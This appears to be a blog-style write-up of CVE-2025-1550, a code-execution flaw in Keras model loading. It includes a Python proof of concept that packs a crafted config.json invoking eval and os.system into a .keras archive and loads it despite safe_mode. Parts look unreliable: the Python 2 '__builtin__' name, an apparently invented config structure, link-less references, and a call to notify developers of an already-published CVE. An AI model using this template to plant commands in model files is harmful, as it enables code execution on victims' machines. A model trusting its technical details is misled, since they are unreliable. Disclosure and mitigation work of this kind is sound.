CVE-2025-1550 - Arbitrary Code Execution Vulnerability in Keras Model.load_model Function

Keras is a popular high-level neural networks API written in Python, which is capable of running on top of TensorFlow, Microsoft Cognitive Toolkit, or Theano. Keras allows users to develop deep learning models in a fast and user-friendly manner, resulting in an extensive user base.

However, a security vulnerability has been discovered in Keras, specifically in the Model.load_model function. This vulnerability, assigned the identifier CVE-2025-1550, permits arbitrary code execution in certain situations, even when the safe_mode=True flag is set. This post will provide a detailed analysis of the vulnerability, along with code snippets to showcase the exploit, and links to original references for further information.

Vulnerability Details

The vulnerability occurs when loading a model from a specially crafted .keras archive. By manipulating the config.json file contained within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, which will be loaded and executed during model loading.

To truly understand how this can be exploited, let's take a look at a code snippet showcasing the vulnerability:

import json
from zipfile import ZipFile

# Create malicious .keras archive
archive_path = 'malicious_archive.keras'
config = {
    "class_name": "keras.wrappers.scikit_learn.KerasClassifier",
    "config": {
        "build_fn": {
            "class_name": "__builtin__.eval",
            "config": {
                "expr": "__import__('os').system('echo Arbitrary code executed')",
                "globals": None
            }
        }
    }
}

with ZipFile(archive_path, 'w') as zf:
    zf.writestr('config.json', json.dumps(config))

# Loading the malicious model archive in Keras
from keras.models import load_model
loaded_model = load_model(archive_path, safe_mode=True)  # Safe mode does not help

In this code snippet, we first create a malicious .keras archive by writing a modified config.json file to the archive, specifying the __builtin__.eval function and providing an arbitrary code execution expression. The archive is then saved as 'malicious_archive.keras'.

Next, the load_model function from Keras is used to load this model archive. Despite the safe_mode=True flag being set, which should ideally prevent code execution, the malicious code contained within the archive is still executed.

Original References

- Keras Repository
- Keras Documentation

Conclusion and Mitigation

The arbitrary code execution vulnerability (CVE-2025-1550) in the Keras Model.load_model function can be exploited by an attacker with knowledge of the architecture and ability to create malicious .keras archives. To mitigate this vulnerability, users are advised to only load models from trusted sources, and thoroughly inspect the contents of model archives before loading them.

Furthermore, the Keras development team should be notified of this vulnerability (if they have not already been made aware) and provide a patch as soon as possible to address the issue.

Timeline

Published on: 03/11/2025 09:15:25 UTC